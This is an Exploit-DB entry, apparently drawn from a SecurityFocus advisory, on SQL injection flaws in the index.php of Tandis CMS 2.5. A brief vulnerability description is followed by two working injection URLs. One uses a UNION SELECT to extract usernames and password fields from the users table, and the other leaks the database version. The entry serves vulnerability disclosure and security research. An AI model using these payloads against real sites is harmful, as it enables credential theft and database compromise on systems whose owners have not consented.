Tandis CMS 2.5 - 'index.php' Multiple SQL Injections

EDB-ID:

32533

CVE:



Author:

G4N0K

Type:

webapps


Platform:

PHP

Date:

2008-10-27


source: https://www.securityfocus.com/bid/31930/info

Tandis CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Tandis CMS 2.5.0 is vulnerable; other versions may also be affected.

http://www.example.com/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users

http://www.example.com/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()--